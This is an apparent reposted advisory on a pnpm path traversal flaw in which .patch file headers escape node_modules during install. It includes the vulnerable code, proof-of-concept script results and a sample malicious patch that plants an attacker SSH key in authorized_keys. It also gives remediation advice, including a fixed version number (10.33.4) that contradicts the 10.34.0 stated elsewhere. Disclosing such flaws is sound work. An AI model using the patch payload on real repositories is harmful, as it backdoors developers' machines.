Listen to this Post
pnpm is a fast, disk-space-efficient package manager for JavaScript projects. Prior to versions 10.34.0 and 11.4.0, pnpm’s patch application pipeline (@pnpm/patch-package) performs no path validation on file paths extracted from `.patch` files.
The vulnerability manifests during `pnpm install` when a `patchedDependencies` entry is present in pnpm-workspace.yaml. pnpm reads the referenced `.patch` file and applies it via the embedded `@pnpm/patch-package` library. The `applyPatchToDir` function at `patching/apply-patch/src/index.ts:12-13` calls process.chdir(opts.patchedDir), setting the working directory to the installed package location deep inside node_modules/.pnpm/.
The patch parser at `@pnpm/patch-package/dist/patch/parse.js:88` extracts file paths from `diff –git a/(.?) b/(.?)` headers using a regex with no path sanitization. The `executeEffects` function in `apply.js` then operates on these unsanitized paths:
File write (`apply.js:35-49`):
case 'file creation': {
const eff = effect
fs.ensureDirSync(dirname(eff.path))
fs.writeFileSync(eff.path, fileContents, { mode: eff.mode })
break
}
File delete (`apply.js:13-22`):
case 'file deletion': {
const eff = effect
// TODO: integrity checks
if (!opts.dryRun) {
fs.unlinkSync(eff.path)
}
break
}
A path like `../../../../../../../../../../home/user/.ssh/authorized_keys` in the patch header traverses out of the package directory to an arbitrary location. An attacker who contributes a malicious patch file via a pull request can write attacker-controlled content to or delete arbitrary files on the filesystem during pnpm install, as the user running the install. The `diff –git` header paths containing `../../` sequences are difficult to catch in code review because patch file diff headers are opaque to most reviewers.
This vulnerability maps to CWE-22 (Path Traversal) and is classified as critical. The CVSS v3.1 score is 7.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H). The vulnerability is fixed in pnpm versions 10.34.0 and 11.4.0.
DailyCVE Form:
| Field | Value |
|-|-|
| Platform | pnpm |
| Version | < 10.34.0, < 11.4.0 |
| Vulnerability | Path Traversal (CWE-22) |
| Severity | Critical (CVSS 7.3) |
| Date | 2026-06-25 |
| Prediction | Patch already available |
What Undercode Say: Analytics
Affected Versions
| Version Range | Status |
||–|
| pnpm < 10.34.0 | Vulnerable |
| pnpm >= 11.0.0, < 11.4.0 | Vulnerable |
| pnpm 10.34.0+ | Fixed |
| pnpm 11.4.0+ | Fixed |
Proof of Concept Commands
Write variant - creates /tmp/vuln6_pwned with attacker-controlled content bash autofyn_audit/exploits/vuln6_patch_traversal_write/exploit.sh Result: PASS -- /tmp/vuln6_pwned created Delete variant - deletes /tmp/vuln7_target bash autofyn_audit/exploits/vuln7_patch_traversal_delete/exploit.sh Result: PASS -- /tmp/vuln7_target deleted Combined chain - delete + replace SSH authorized_keys bash autofyn_audit/exploits/chain2_patch_ssh_backdoor/exploit.sh Result: PASS -- authorized_keys replaced with attacker's public key
Malicious Patch File Structure
diff --git a/../../../../../../home/user/.ssh/authorized_keys b/../../../../../../home/user/.ssh/authorized_keys new file mode 100644 index 0000000..1234567 /dev/null +++ b/../../../../../../home/user/.ssh/authorized_keys @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAA... attacker@evil
Exploit
An attacker can exploit this vulnerability by:
- Submitting a Pull Request containing a malicious `.patch` file and a `patchedDependencies` entry in `pnpm-workspace.yaml`
2. Crafting the patch with `diff –git` headers containing `../` traversal sequences to escape the package directory
3. Targeting writable files such as:
– `~/.ssh/authorized_keys` (SSH backdoor)
– ~/.bashrc, `~/.zshrc` (shell configuration)
– CI/CD configuration files
– Any file writable by the user running `pnpm install`
4. The attack occurs automatically when any user runs `pnpm install` on the compromised repository, executing as the user running the install
The exploitation is considered easy, and the attack can be initiated remotely. Patch files may receive less review scrutiny than `package.json` changes because the `../` traversal sequences are in `diff –git` headers that appear as ordinary patch metadata.
Protection
Immediate Remediation
Upgrade pnpm to a patched version:
For pnpm 10.x pnpm add -g [email protected] For pnpm 11.x pnpm add -g [email protected]
Upgrading to version 10.33.4 or 11.4.0 eliminates this vulnerability.
Code-Level Fix (For Vendors)
Validate parsed patch file paths against the package root directory. Reject any path that resolves outside the patched package directory via `path.resolve` + prefix check. Alternatively, sanitize at parse time by rejecting paths containing `..` components in parse.js.
Security Controls
- Automated scanning of patch files for suspicious path traversal patterns (
../,..\) - Restrict the use of patch files from untrusted sources
- Code review training to identify path traversal sequences in `diff –git` headers
- Runtime monitoring to detect unauthorized file system modifications during package installation
- Maintain strict access controls on systems where pnpm is installed
Impact
Arbitrary file write and delete as the user running pnpm install, limited to paths writable by that user.
An attacker can:
- Overwrite critical system files and inject malicious code
- Establish persistence by modifying configuration files or scripts
- Target SSH authorized_keys, shell configuration, CI/CD files, or other writable files
- Execute arbitrary code on systems where pnpm is installed
The vulnerability is particularly dangerous because:
- Patch files are commonly used in development workflows
- The attack vector is subtle and difficult to detect during PR reviews
- The attack occurs during the legitimate package installation process
Discovered by: AutoFyn
Full audit report: `audit_report.md`
Exploit script: `exploit.sh`
GitHub Security Advisory: GHSA-rxhj-4m44-96r4
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
